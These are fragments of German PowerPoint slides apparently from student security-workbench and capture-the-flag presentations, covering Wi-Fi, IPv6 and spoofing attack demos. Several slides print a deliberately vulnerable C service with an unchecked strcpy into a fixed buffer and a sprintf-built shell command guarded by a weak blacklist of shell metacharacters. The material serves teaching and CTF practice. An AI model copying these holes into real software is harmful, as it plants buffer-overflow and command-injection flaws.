              <a:t>Angriffsrechner mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>radvd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, nat64, bind9, wide-dhcp6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p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Voraussetzungen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994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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Idee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Umsetzung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Hardware &amp; Aufbau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Dokumentation &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Anweisungen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Die Demos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>WEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Fake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-AP</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>WPA/WPA2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>WPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Für die Zukunft</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"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Zugang zum angegriffenen IPv4 Netz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angegriffene Rechner mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>unkonfiguriertem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, aber aktiviertem IPv6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angriffsrechner mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>radvd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>tayga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, bind9, wide-dhcp6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p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Funktionsweise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950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Fake-IPv6 Netz - Funktionsweise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66" y="399627"/>
            <a:ext cx="4563112" cy="605874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967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In Summe sechs lauffähige Angriffsszenarien</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Angriffe können automatisiert vorgeführt werden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Schnelle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Demonstration vor Publikum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>möglich</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Implementierungen sind nach einem festen Schema aufgebaut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 smtClean="0"/>
              <a:t>Wartbarkeit und Erweiterbarkeit damit gegeben</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ausführliche Dokumentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Funktionsweise des Angriffs wird theoretisch erklärt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Benutzung der Tools für den Angriff inkl. Parameter sind dokumentiert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Anwendung der (Python-)Implementierungen werden beschrieben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443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 algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2500" dirty="0" smtClean="0"/>
              <a:t>ARP-Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2500" smtClean="0"/>
              <a:t>DNS-Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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Security-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Workbench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Julian Rieder, Sebastian Schuster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16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13.01.16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Stefan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Zandtner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Maximilian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Wenzl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Philipp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Weitl, Dominik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Schlecht, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Löckler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>, Sebastian Beck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International Capture The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Flag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163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Roxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> &amp; 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Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Overflow 			Maximilian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wenzl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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 					Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Löckler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Cross Site Scripting 		Stefan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Zandtner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Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0"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Mitmproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0"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3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Roxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> &amp; 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iCTF</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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Aufbau</a:t>
            </a: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Services - Schwachstellen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SecurityWorkBench</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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Debian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Demo: P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roxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> + Tor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768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95200" y="1811740"/>
            <a:ext cx="2982838" cy="5078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b="1" kern="0" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360000" lvl="1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 baseline="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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Vorteile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t>Sicherheit für Teilnehmer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t>Sicherheit für THI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Nachteile:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t>Wenig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0" err="1"/>
              <a:t>PC‘s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t> mit Zugriff </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0" smtClean="0"/>
              <a:t>	auf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t>die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0" err="1"/>
              <a:t>Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t>-Maschine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t>Keine Zentrale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0" err="1"/>
              <a:t>Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" b="0" dirty="0"/>
              <a:t>-VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE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3278038" y="126753"/>
          <a:ext cx="4917634" cy="6364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Acrobat Document" r:id="rId5" imgW="5829013" imgH="7543610" progId="AcroExch.Document.DC">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId5" imgW="5829013" imgH="754361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8038" y="126753"/>
                        <a:ext cx="4917634" cy="6364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3182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de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>{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srand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>(time(NULL));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>invalid_characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>("O3w+PGAkLQ==",(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>) 12, &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>);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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>[BUFSIZ];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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>[100]; // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>know</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>..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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> ran = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>rand_lim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>(100);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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>ciFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t> = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1"/>
              <a:t>size_t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= 108;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Services – Schwachstellen - CI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39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911958" y="2418266"/>
            <a:ext cx="1176950" cy="1086415"/>
            <a:chOff x="5323438" y="2381062"/>
            <a:chExt cx="1176950" cy="1086415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rechteck 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5477346" y="2381062"/>
              <a:ext cx="1023042" cy="4798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;|&gt;&lt;`$-</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Gerade Verbindung mit Pfeil 7"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5323438" y="2860895"/>
              <a:ext cx="665429" cy="60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feld 9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410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 - Was hatten wir geplant -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Angriffsszenarien als Demos aufbereiten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Dokumentation mit Erklärungen für das Verständnis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Theoretischer Hintergrund und Einleitung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Voraussetzungen für die Hacks (Hardware &amp; Software)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Durchführung der Angriffe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Tools, Befehle und Parameter mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Beschreibung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Praktisches Anwenden des Gelernten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Idee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989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27739" y="1504095"/>
            <a:ext cx="2857650" cy="474045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 // Read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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  //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characters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test_regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>) == -1){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>("Na\n");</a:t>
            </a:r>
          </a:p>
          <a:p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-1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> *c = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> (*c)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>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strchr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>invalid_characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, *c))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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>("Na\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>       // Set </a:t>
            </a:r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r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>ciFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>c++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  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Services – Schwachstellen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>- CI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731764" y="1263965"/>
            <a:ext cx="2857650" cy="4740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3731764" y="1504096"/>
            <a:ext cx="5167793" cy="47404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 err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
